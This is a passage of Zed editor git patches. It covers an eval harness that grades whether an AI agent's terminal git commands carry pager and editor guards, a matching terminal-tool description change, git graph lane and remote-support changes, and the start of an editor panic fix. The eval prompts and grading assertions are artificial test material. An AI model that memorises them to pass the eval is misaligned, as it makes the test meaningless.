"GIT_EDITOR=:", "EDITOR=true", "EDITOR=:"]; + + let has_pager_guard = PAGER_GUARDS.iter().any(|guard| cmd.contains(guard)); + let has_editor_guard = EDITOR_GUARDS.iter().any(|guard| cmd.contains(guard)); + + for subcmd in PAGER_SUBCMDS { + if words.contains(subcmd) && !has_pager_guard { + return EvalAssertionOutcome { + score: 0, + message: Some(format!( + "`git {subcmd}` is missing a pager guard \ + (one of {PAGER_GUARDS:?}). Command: {cmd}" + )), + }; + } + } + + for subcmd in EDITOR_SUBCMDS { + if words.contains(subcmd) && !has_editor_guard { + return EvalAssertionOutcome { + score: 0, + message: Some(format!( + "`git {subcmd}` is missing an editor guard \ + (one of {EDITOR_GUARDS:?}). Command: {cmd}" + )), + }; + } + } + + EvalAssertionOutcome { + score: 100, + message: None, + } + }) + } +} + +struct EvalOutput { + tool_input: TerminalToolInput, + assertion: EvalAssertionOutcome, + assertion_description: &'static str, +} + +impl Display for EvalOutput { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + writeln!(f, "Score: {}", self.assertion.score)?; + writeln!(f, "Assertion: {}", self.assertion_description)?; + if let Some(message) = self.assertion.message.as_ref() { + writeln!(f, "Message: {}", message)?; + } + writeln!(f, "Tool input: {:#?}", self.tool_input)?; + Ok(()) + } +} + +struct TerminalToolTest { + model: Arc, + model_thinking_effort: Option, +} + +impl TerminalToolTest { + async fn new(cx: &mut TestAppContext) -> Self { + cx.executor().allow_parking(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + + gpui_tokio::init(cx); + let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); + cx.set_http_client(http_client); + let client = Client::production(cx); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store, client, cx); + }); + + let agent_model = SelectedModel::from_str( + &std::env::var("ZED_AGENT_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + + let authenticate_provider_tasks = cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }) + }); + + let model = cx + .update(|cx| { + cx.spawn(async move |cx| { + futures::future::join_all(authenticate_provider_tasks).await; + load_model(&agent_model, cx).await.unwrap() + }) + }) + .await; + + let model_thinking_effort = model + .default_effort_level() + .map(|effort_level| effort_level.value.to_string()); + + Self { + model, + model_thinking_effort, + } + } + + async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { + eval.conversation + .last_mut() + .context("Conversation must not be empty")? + .cache = true; + + let tools = crate::built_in_tools().collect::>(); + + let system_prompt = { + let worktrees = vec![WorktreeContext { + root_name: "root".to_string(), + abs_path: Path::new("/path/to/root").into(), + rules_file: None, + }]; + let project_context = ProjectContext::new(worktrees, Vec::default()); + let tool_names = tools + .iter() + .map(|tool| tool.name.clone().into()) + .collect::>(); + let template = crate::SystemPromptTemplate { + project: &project_context, + available_tools: tool_names, + model_name: None, + }; + template.render(&Templates::new())? + }; + + let has_system_prompt = eval + .conversation + .first() + .is_some_and(|msg| msg.role == Role::System); + let messages = if has_system_prompt { + eval.conversation + } else { + [LanguageModelRequestMessage { + role: Role::System, + content: vec![MessageContent::Text(system_prompt)], + cache: true, + reasoning_details: None, + }] + .into_iter() + .chain(eval.conversation) + .collect::>() + }; + + let request = LanguageModelRequest { + messages, + tools, + thinking_allowed: true, + thinking_effort: self.model_thinking_effort.clone(), + ..Default::default() + }; + + let tool_input = + retry_on_rate_limit(async || extract_tool_use(&self.model, request.clone(), cx).await) + .await?; + + let assertion = (eval.assertion.check)(&tool_input); + Ok(EvalOutput { + tool_input, + assertion, + assertion_description: eval.assertion.description, + }) + } +} + +async fn load_model( + selected_model: &SelectedModel, + cx: &mut AsyncApp, +) -> Result> { + cx.update(|cx| { + let registry = LanguageModelRegistry::read_global(cx); + let provider = registry + .provider(&selected_model.provider) + .expect("Provider not found"); + provider.authenticate(cx) + }) + .await?; + Ok(cx.update(|cx| { + let models = LanguageModelRegistry::read_global(cx); + models + .available_models(cx) + .find(|model| { + model.provider_id() == selected_model.provider && model.id() == selected_model.model + }) + .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)) + })) +} + +/// Stream the model completion and extract the first complete tool use whose +/// name matches `TerminalTool::NAME`, parsed as `TerminalToolInput`. +async fn extract_tool_use( + model: &Arc, + request: LanguageModelRequest, + cx: &mut TestAppContext, +) -> Result { + let model = model.clone(); + let events = cx + .update(|cx| { + let async_cx = cx.to_async(); + cx.foreground_executor() + .spawn(async move { model.stream_completion(request, &async_cx).await }) + }) + .await + .map_err(|err| anyhow::anyhow!("completion error: {}", err))?; + + let mut streamed_text = String::new(); + let mut stop_reason = None; + let mut parse_errors = Vec::new(); + + let mut events = events.fuse(); + while let Some(event) = events.next().await { + match event { + Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) + if tool_use.is_input_complete && tool_use.name.as_ref() == TerminalTool::NAME => + { + let input: TerminalToolInput = serde_json::from_value(tool_use.input) + .context("Failed to parse tool input as TerminalToolInput")?; + return Ok(input); + } + Ok(LanguageModelCompletionEvent::Text(text)) => { + if streamed_text.len() < 2_000 { + streamed_text.push_str(&text); + } + } + Ok(LanguageModelCompletionEvent::Stop(reason)) => { + stop_reason = Some(reason); + } + Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { + tool_name, + raw_input, + json_parse_error, + .. + }) if tool_name.as_ref() == TerminalTool::NAME => { + parse_errors.push(format!("{json_parse_error}\nRaw input:\n{raw_input:?}")); + } + Err(err) => { + return Err(anyhow::anyhow!("completion error: {}", err)); + } + _ => {} + } + } + + let streamed_text = streamed_text.trim(); + let streamed_text_suffix = if streamed_text.is_empty() { + String::new() + } else { + format!("\nStreamed text:\n{streamed_text}") + }; + let stop_reason_suffix = stop_reason + .map(|reason| format!("\nStop reason: {reason:?}")) + .unwrap_or_default(); + let parse_errors_suffix = if parse_errors.is_empty() { + String::new() + } else { + format!("\nTool parse errors:\n{}", parse_errors.join("\n")) + }; + + anyhow::bail!( + "Stream ended without a terminal tool use{stop_reason_suffix}{parse_errors_suffix}{streamed_text_suffix}" + ) +} + +async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { + const MAX_RETRIES: usize = 20; + let mut attempt = 0; + + loop { + attempt += 1; + let response = request().await; + + if attempt >= MAX_RETRIES { + return response; + } + + let retry_delay = match &response { + Ok(_) => None, + Err(err) => match err.downcast_ref::() { + Some(err) => match &err { + LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } + | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } + LanguageModelCompletionError::UpstreamProviderError { + status, + retry_after, + .. + } => { + let should_retry = matches!( + *status, + StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE + ) || status.as_u16() == 529; + + if should_retry { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } else { + None + } + } + LanguageModelCompletionError::ApiReadResponseError { .. } + | LanguageModelCompletionError::ApiInternalServerError { .. } + | LanguageModelCompletionError::HttpSend { .. } => { + Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) + } + _ => None, + }, + _ => None, + }, + }; + + if let Some(retry_after) = retry_delay { + let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); + eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); + #[allow(clippy::disallowed_methods)] + async_io::Timer::after(retry_after + jitter).await; + } else { + return response; + } + } +} + +fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { + let dispatcher = gpui::TestDispatcher::new(rand::random()); + let mut cx = TestAppContext::build(dispatcher, None); + let foreground_executor = cx.foreground_executor().clone(); + let result = foreground_executor.block_test(async { + let test = TerminalToolTest::new(&mut cx).await; + let result = test.eval(eval, &mut cx).await; + drop(test); + cx.run_until_parked(); + result + }); + cx.quit(); + match result { + Ok(output) => eval_utils::EvalOutput { + data: output.to_string(), + outcome: if output.assertion.score < 80 { + eval_utils::OutcomeKind::Failed + } else { + eval_utils::OutcomeKind::Passed + }, + metadata: (), + }, + Err(err) => eval_utils::EvalOutput { + data: format!("{err:?}"), + outcome: eval_utils::OutcomeKind::Error, + metadata: (), + }, + } +} + +fn message( + role: Role, + contents: impl IntoIterator, +) -> LanguageModelRequestMessage { + LanguageModelRequestMessage { + role, + content: contents.into_iter().collect(), + cache: false, + reasoning_details: None, + } +} + +fn text(text: impl Into) -> MessageContent { + MessageContent::Text(text.into()) +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_log_uses_no_pager() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + Use the terminal tool to show me the most recent 3 commits + on the current branch (subject lines only is fine). + "})], + )], + CommandAssertion::git_pty_safe( + "`git log`-style prompt produces a pty-safe git command", + ), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_rebase_sets_git_editor() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + Use the terminal tool to rebase the current branch onto + `origin/main`. + "})], + )], + CommandAssertion::git_pty_safe("`git rebase` prompt produces a pty-safe git command"), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_git_rebase_implied_sets_git_editor() { + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![message( + User, + [text(indoc::indoc! {" + My branch has 3 small commits that I'd like to combine + into a single clean commit before merging. Help me do + that with the terminal tool. + "})], + )], + CommandAssertion::git_pty_safe("indirect prompt produces a pty-safe git command"), + )) + }); +} diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 34d19c581a40da..4f0c6b48c80af6 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -34,11 +34,16 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Remember that each invocation of this tool will spawn a new shell process, so you can't rely on any state from previous invocations. /// -/// The terminal emulator is an interactive pty, so commands may block waiting for user input. -/// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. +/// The terminal is an interactive pty, so any command that blocks waiting for input will hang the tool until it times out. To avoid this: +/// +/// - Always insert `--no-pager` immediately after `git` for any read-only git command, including `git log`, `git diff`, `git show`, `git blame`, and `git stash show`. Example: `git --no-pager log -n 5` (NOT `git log -n 5`). +/// - Always prepend `GIT_EDITOR=true ` to any git command that may invoke an editor, including `git rebase`, `git commit`, `git merge`, and `git tag`. Example: `GIT_EDITOR=true git rebase origin/main` (NOT `git rebase origin/main`). +/// - For other commands that may open a pager or editor, set `PAGER=cat` and/or `EDITOR=true` similarly. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. + /// + /// REMINDER: read-only git commands (`git log`, `git diff`, `git show`, `git blame`) MUST include `--no-pager` (e.g. `git --no-pager log`). Git commands that may open an editor (`git rebase`, `git commit`, `git merge`, `git tag`) MUST be prefixed with `GIT_EDITOR=true ` (e.g. `GIT_EDITOR=true git rebase origin/main`). Otherwise the terminal will hang. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. pub cd: String, From c54f5f3c301cb77a7b3a19ddd99bc542c5820440 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Tue, 5 May 2026 17:07:52 -0400 Subject: [PATCH 211/231] git_graph: Keep shared parents on the leftmost incoming lane (#55818) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes git graph lane selection when multiple active lanes point to the same parent commit, matching Git’s `--graph` behavior by keeping the commit on the leftmost incoming lane instead of the first discovered lane. This should make it much easier to track long lived branches ### Before image ### After Screenshot 2026-05-05 at 4 07 28 PM Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Remco Smits --- crates/git_graph/src/git_graph.rs | 72 ++++++++++++++++++++++++++++++- 1 file changed, 71 insertions(+), 1 deletion(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 73ad9293e17318..ac9a01deb9fb4a 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -640,7 +640,7 @@ impl GraphData { let commit_lane = self .parent_to_lanes .get(&commit.sha) - .and_then(|lanes| lanes.first().copied()); + .and_then(|lanes| lanes.iter().min().copied()); let commit_lane = commit_lane.unwrap_or_else(|| self.first_empty_lane_idx()); @@ -4049,6 +4049,74 @@ mod tests { Ok(()) } + fn verify_keep_shared_parents_on_leftmost_lane(graph: &GraphData) -> Result<()> { + let mut active_lane_parents: Vec> = Vec::new(); + let mut parent_to_lanes: HashMap> = HashMap::default(); + + for (row, entry) in graph.commits.iter().enumerate() { + let pending_lanes = parent_to_lanes.remove(&entry.data.sha).unwrap_or_default(); + + if pending_lanes.len() > 1 + && let Some(expected_lane) = pending_lanes.iter().copied().min() + && entry.lane != expected_lane + { + bail!( + "commit {:?} at row {} uses lane {}, but shared parent should use leftmost pending lane {} from {:?}", + entry.data.sha, + row, + entry.lane, + expected_lane, + pending_lanes + ); + } + + for lane in pending_lanes { + let Some(active_lane_parent) = active_lane_parents.get_mut(lane) else { + bail!( + "commit {:?} at row {} was pending on missing lane {}", + entry.data.sha, + row, + lane + ); + }; + + if *active_lane_parent != Some(entry.data.sha) { + bail!( + "commit {:?} at row {} was pending on lane {}, but that lane points to {:?}", + entry.data.sha, + row, + lane, + active_lane_parent + ); + } + + *active_lane_parent = None; + } + + for (parent_index, parent) in entry.data.parents.iter().enumerate() { + let lane = if parent_index == 0 { + entry.lane + } else if let Some(empty_lane) = + active_lane_parents.iter().position(Option::is_none) + { + empty_lane + } else { + active_lane_parents.push(None); + active_lane_parents.len() - 1 + }; + + if lane >= active_lane_parents.len() { + active_lane_parents.resize(lane + 1, None); + } + + active_lane_parents[lane] = Some(*parent); + parent_to_lanes.entry(*parent).or_default().push(lane); + } + } + + Ok(()) + } + fn verify_coverage(graph: &GraphData) -> Result<()> { let mut expected_edges: HashSet<(Oid, Oid)> = HashSet::default(); for entry in &graph.commits { @@ -4197,6 +4265,8 @@ mod tests { verify_column_correctness(graph, &oid_to_row).context("column correctness")?; verify_segment_continuity(graph).context("segment continuity")?; verify_merge_line_optimality(graph, &oid_to_row).context("merge line optimality")?; + verify_keep_shared_parents_on_leftmost_lane(graph) + .context("keep shared parents on leftmost lane")?; verify_coverage(graph).context("coverage")?; verify_line_overlaps(graph).context("line overlaps")?; Ok(()) From 6552f418a0b154b56cc81df2ce2eab5683c271f9 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Tue, 5 May 2026 17:44:06 -0400 Subject: [PATCH 212/231] git_graph: Add remote support (#55788) Follow up: https://github.com/zed-industries/zed/pull/55167, https://github.com/zed-industries/zed/pull/54468 This is the final PR for adding remote support on the git graph. It uses the client stream request support added in #55167 to add support for the initial graph data request. I also fixed a bug where `GitGraph::FullyLoaded` repository event was never emitted. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes ##53040 Co-authored-by: Remco Smits \ Release Notes: - git_graph: Add remote support --------- Co-authored-by: Ben Kunkle --- crates/project/src/git_store.rs | 364 +++++++++++++++++++++++++++----- crates/proto/proto/git.proto | 24 +++ crates/proto/proto/zed.proto | 4 +- crates/proto/src/proto.rs | 4 + 4 files changed, 337 insertions(+), 59 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 20facc32640bf9..d5c6565b6ccd80 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -361,6 +361,7 @@ pub struct InitialGitGraphData { pub error: Option, pub commit_data: Vec>, pub commit_oid_to_index: HashMap, + subscribers: Vec>, SharedString>>>, } pub struct GraphDataResponse<'a> { @@ -680,6 +681,7 @@ impl GitStore { client.add_entity_request_handler(Self::handle_edit_ref); client.add_entity_request_handler(Self::handle_repair_worktrees); client.add_entity_request_handler(Self::handle_get_commit_data); + client.add_entity_stream_request_handler(Self::handle_get_initial_graph_data); client.add_entity_stream_request_handler(Self::handle_search_commits); } @@ -2670,6 +2672,105 @@ impl GitStore { Ok(proto::GetCommitDataResponse { commits }) } + async fn handle_get_initial_graph_data( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result>> { + const CHUNK_SIZE: usize = git::repository::GRAPH_CHUNK_SIZE; + let payload = envelope.payload; + + let repository_id = RepositoryId::from_proto(payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let log_order = log_order_from_proto(payload.log_order()); + let log_source = log_source_from_proto( + payload + .log_source + .context("missing initial graph data log source")?, + )?; + + let (subscriber_sender, subscriber_receiver) = async_channel::unbounded(); + let (cached_commits, error, is_loading) = + repository_handle.update(&mut cx, |repository, cx| { + let response = + repository.graph_data(log_source.clone(), log_order, 0..usize::MAX, cx); + let cached_commits = response.commits.to_vec(); + let error = response.error.clone(); + let is_loading = response.is_loading; + + if is_loading { + if let Some(graph_data) = repository + .initial_graph_data + .get_mut(&(log_source.clone(), log_order)) + { + graph_data.subscribers.push(subscriber_sender); + } + } + + (cached_commits, error, is_loading) + }); + + let (mut response_tx, response_rx) = mpsc::unbounded(); + cx.background_spawn(async move { + if let Some(error) = error { + if response_tx + .send(Err(anyhow!(error.to_string()))) + .await + .is_err() + { + return; + } + return; + } + + for commits in cached_commits.chunks(CHUNK_SIZE) { + let response = proto::GetInitialGraphDataResponse { + commits: commits + .iter() + .map(|commit| initial_graph_commit_to_proto(commit)) + .collect(), + }; + if response_tx.send(Ok(response)).await.is_err() { + return; + } + } + + if !is_loading { + return; + } + + while let Ok(chunk_result) = subscriber_receiver.recv().await { + let commits = match chunk_result { + Ok(commits) => commits, + Err(error) => { + response_tx + .send(Err(anyhow!(error.to_string()))) + .await + .context("Failed to send error") + .log_err(); + return; + } + }; + + for commits in commits.chunks(CHUNK_SIZE) { + let response = proto::GetInitialGraphDataResponse { + commits: commits + .iter() + .map(|commit| initial_graph_commit_to_proto(commit)) + .collect(), + }; + if response_tx.send(Ok(response)).await.is_err() { + return; + } + } + } + }) + .detach(); + + Ok(response_rx) + } + async fn handle_search_commits( this: Entity, envelope: TypedEnvelope, @@ -4413,23 +4514,7 @@ impl Repository { }); let (job_sender, state) = (refetch_repo_state)(cx); - - // todo(git_graph_remote): Make this subscription on both remote/local repo - cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { - RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { - if this.scan_id > 2 { - this.initial_graph_data.clear(); - } - } - RepositoryEvent::StashEntriesChanged => { - if this.scan_id > 2 { - this.initial_graph_data - .retain(|(log_source, _), _| *log_source != LogSource::All); - } - } - _ => {} - }) - .detach(); + cx.subscribe_self(Self::handle_subscribe_self).detach(); Repository { this: cx.weak_entity(), @@ -4481,6 +4566,8 @@ impl Repository { }); let (job_sender, repository_state) = (refetch_repo_state)(cx); + cx.subscribe_self(Self::handle_subscribe_self).detach(); + Self { this: cx.weak_entity(), snapshot, @@ -4501,6 +4588,25 @@ impl Repository { } } + fn handle_subscribe_self(&mut self, event: &RepositoryEvent, _: &mut Context) { + // scan id greater than 2 means the initial snapshot was calculated, + // otherwise we don't need to refresh the graph state + match event { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { + if self.scan_id > 2 { + self.initial_graph_data.clear(); + } + } + RepositoryEvent::StashEntriesChanged => { + if self.scan_id > 2 { + self.initial_graph_data + .retain(|(log_source, _), _| *log_source != LogSource::All); + } + } + _ => {} + } + } + pub fn git_store(&self) -> Option> { self.git_store.upgrade() } @@ -5121,28 +5227,51 @@ impl Repository { ) .await } - Ok(RepositoryState::Remote(_)) => { - Err("Git graph is not supported for collab yet".into()) + Ok(RepositoryState::Remote(remote)) => { + Self::remote_git_graph_data( + repository.clone(), + remote, + log_source.clone(), + log_order, + cx, + ) + .await } Err(e) => Err(SharedString::from(e)), }; - if let Err(fetch_task_error) = result { - repository - .update(cx, |repository, _| { - if let Some(data) = repository - .initial_graph_data - .get_mut(&(log_source, log_order)) - { - data.error = Some(fetch_task_error); - } else { - debug_panic!( - "This task would be dropped if this entry doesn't exist" - ); + repository + .update(cx, |repository, cx| { + if let Some(data) = repository + .initial_graph_data + .get_mut(&(log_source.clone(), log_order)) + { + match &result { + Ok(()) => { + cx.emit(RepositoryEvent::GraphEvent( + (log_source.clone(), log_order), + GitGraphEvent::FullyLoaded, + )); + } + Err(fetch_task_error) => { + data.subscribers.retain(|sender| { + sender.try_send(Err(fetch_task_error.clone())).is_ok() + }); + data.error = Some(fetch_task_error.clone()); + cx.emit(RepositoryEvent::GraphEvent( + (log_source.clone(), log_order), + GitGraphEvent::LoadingError, + )); + } } - }) - .ok(); - } + data.subscribers.clear(); + } else { + debug_panic!( + "This task would be dropped if this entry doesn't exist" + ); + } + }) + .log_err(); }); InitialGitGraphData { @@ -5150,6 +5279,7 @@ impl Repository { error: None, commit_data: Vec::new(), commit_oid_to_index: HashMap::default(), + subscribers: Vec::new(), } }); @@ -5164,6 +5294,47 @@ impl Repository { } } + async fn append_initial_graph_commits( + this: &WeakEntity, + graph_data_key: &(LogSource, LogOrder), + initial_graph_commit_data: Vec>, + cx: &mut AsyncApp, + ) { + this.update(cx, |repository, cx| { + let graph_data = repository + .initial_graph_data + .entry(graph_data_key.clone()) + .and_modify(|graph_data| { + if !graph_data.subscribers.is_empty() { + graph_data.subscribers.retain(|sender| { + sender + .try_send(Ok(initial_graph_commit_data.clone())) + .is_ok() + }); + } + + for commit_data in initial_graph_commit_data { + graph_data + .commit_oid_to_index + .insert(commit_data.sha, graph_data.commit_data.len()); + graph_data.commit_data.push(commit_data); + } + cx.emit(RepositoryEvent::GraphEvent( + graph_data_key.clone(), + GitGraphEvent::CountUpdated(graph_data.commit_data.len()), + )); + }); + + match &graph_data { + Entry::Occupied(_) => {} + Entry::Vacant(_) => { + debug_panic!("This task should be dropped if data doesn't exist"); + } + } + }) + .log_err(); + } + async fn local_git_graph_data( this: WeakEntity, backend: Arc, @@ -5187,34 +5358,52 @@ impl Repository { let graph_data_key = (log_source, log_order); while let Ok(initial_graph_commit_data) = request_rx.recv().await { - this.update(cx, |repository, cx| { - let graph_data = repository - .initial_graph_data - .entry(graph_data_key.clone()) - .and_modify(|graph_data| { - for commit_data in initial_graph_commit_data { - graph_data - .commit_oid_to_index - .insert(commit_data.sha, graph_data.commit_data.len()); - graph_data.commit_data.push(commit_data); - } - cx.emit(RepositoryEvent::GraphEvent( - graph_data_key.clone(), - GitGraphEvent::CountUpdated(graph_data.commit_data.len()), - )); - }); + Self::append_initial_graph_commits( + &this, + &graph_data_key, + initial_graph_commit_data, + cx, + ) + .await; + } - match &graph_data { - Entry::Occupied(_) => {} - Entry::Vacant(_) => { - debug_panic!("This task should be dropped if data doesn't exist"); - } - } + task.await?; + Ok(()) + } + + async fn remote_git_graph_data( + this: WeakEntity, + remote: RemoteRepositoryState, + log_source: LogSource, + log_order: LogOrder, + cx: &mut AsyncApp, + ) -> Result<(), SharedString> { + let repository_id = this + .update(cx, |repository, _| repository.id) + .map_err(|err| SharedString::from(err.to_string()))?; + let graph_data_key = (log_source.clone(), log_order); + let mut response = remote + .client + .request_stream(proto::GetInitialGraphData { + project_id: remote.project_id.to_proto(), + repository_id: repository_id.to_proto(), + log_source: Some(log_source_to_proto(&log_source)), + log_order: log_order_to_proto(log_order), }) - .ok(); + .await + .map_err(|err| SharedString::from(err.to_string()))?; + + while let Some(response) = response.next().await { + let response = response.map_err(|err| SharedString::from(err.to_string()))?; + let commits = response + .commits + .into_iter() + .map(initial_graph_commit_from_proto) + .collect::>>() + .map_err(|err| SharedString::from(err.to_string()))?; + Self::append_initial_graph_commits(&this, &graph_data_key, commits, cx).await; } - task.await?; Ok(()) } @@ -8249,6 +8438,65 @@ fn log_source_from_proto(log_source: proto::GitLogSource) -> Result { } } +fn log_order_to_proto(log_order: LogOrder) -> i32 { + match log_order { + LogOrder::DateOrder => proto::get_initial_graph_data::LogOrder::DateOrder as i32, + LogOrder::TopoOrder => proto::get_initial_graph_data::LogOrder::TopoOrder as i32, + LogOrder::AuthorDateOrder => { + proto::get_initial_graph_data::LogOrder::AuthorDateOrder as i32 + } + LogOrder::ReverseChronological => { + proto::get_initial_graph_data::LogOrder::ReverseChronological as i32 + } + } +} + +fn log_order_from_proto(log_order: proto::get_initial_graph_data::LogOrder) -> LogOrder { + match log_order { + proto::get_initial_graph_data::LogOrder::DateOrder => LogOrder::DateOrder, + proto::get_initial_graph_data::LogOrder::TopoOrder => LogOrder::TopoOrder, + proto::get_initial_graph_data::LogOrder::AuthorDateOrder => LogOrder::AuthorDateOrder, + proto::get_initial_graph_data::LogOrder::ReverseChronological => { + LogOrder::ReverseChronological + } + } +} + +fn initial_graph_commit_to_proto(commit: &InitialGraphCommitData) -> proto::InitialGraphCommit { + proto::InitialGraphCommit { + sha: commit.sha.to_string(), + parents: commit + .parents + .iter() + .map(|parent| parent.to_string()) + .collect(), + ref_names: commit + .ref_names + .iter() + .map(|ref_name| ref_name.to_string()) + .collect(), + } +} + +fn initial_graph_commit_from_proto( + commit: proto::InitialGraphCommit, +) -> Result> { + let sha = Oid::from_str(&commit.sha)?; + let mut parents = SmallVec::with_capacity(commit.parents.len()); + for parent in &commit.parents { + parents.push(Oid::from_str(parent)?); + } + Ok(Arc::new(InitialGraphCommitData { + sha, + parents, + ref_names: commit + .ref_names + .into_iter() + .map(SharedString::from) + .collect(), + })) +} + fn commit_data_to_proto(commit: &CommitData) -> proto::CommitData { proto::CommitData { sha: commit.sha.to_string(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index afea6cf34a3eaa..bf7bbeb4359f27 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -705,6 +705,30 @@ message GitLogSource { } } +message GetInitialGraphData { + uint64 project_id = 1; + uint64 repository_id = 2; + GitLogSource log_source = 3; + + enum LogOrder { + DATE_ORDER = 0; + TOPO_ORDER = 1; + AUTHOR_DATE_ORDER = 2; + REVERSE_CHRONOLOGICAL = 3; + } + LogOrder log_order = 4; +} + +message InitialGraphCommit { + string sha = 1; + repeated string parents = 2; + repeated string ref_names = 3; +} + +message GetInitialGraphDataResponse { + repeated InitialGraphCommit commits = 1; +} + message SearchCommits { uint64 project_id = 1; uint64 repository_id = 2; diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index 0c149fb2976844..a0fde40a84b85d 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -482,7 +482,9 @@ message Envelope { GetCommitData get_commit_data = 447; GetCommitDataResponse get_commit_data_response = 448; SearchCommits search_commits = 449; - SearchCommitsResponse search_commits_response = 450; // current max + SearchCommitsResponse search_commits_response = 450; + GetInitialGraphData get_initial_graph_data = 451; + GetInitialGraphDataResponse get_initial_graph_data_response = 452; // current max } reserved 87 to 88; diff --git a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 651e11354a9d36..49b9db0d5c37b9 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -358,6 +358,8 @@ messages!( (GitRepairWorktrees, Background), (GetCommitData, Background), (GetCommitDataResponse, Background), + (GetInitialGraphData, Background), + (GetInitialGraphDataResponse, Background), (SearchCommits, Background), (SearchCommitsResponse, Background), (GitWorktreesResponse, Background), @@ -575,6 +577,7 @@ request_messages!( (GitEditRef, Ack), (GitRepairWorktrees, Ack), (GetCommitData, GetCommitDataResponse), + (GetInitialGraphData, GetInitialGraphDataResponse), (SearchCommits, SearchCommitsResponse), (GitCreateWorktree, Ack), (GitRemoveWorktree, Ack), @@ -770,6 +773,7 @@ entity_messages!( GitEditRef, GitRepairWorktrees, GetCommitData, + GetInitialGraphData, SearchCommits, GitCreateArchiveCheckpoint, GitRestoreArchiveCheckpoint, From 61d506ea2543602f47807069cf42ad3d4c69f413 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 5 May 2026 18:46:22 -0300 Subject: [PATCH 213/231] editor: Fix panic in `text_layout_details` pre layout (#55816) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes a panic at `Editor::text_layout_details` when called against an editor whose element has never been laid out (i.e., `set_style` has never been called, so the cached `style` is still `None`). We've seen this crash once through a helix motion. The exact production sequence isn't clear — for the editor to receive a vim action without ever having been drawn, the active item would have to have changed inside the same update tick that ends with the deferred `search_submit`, 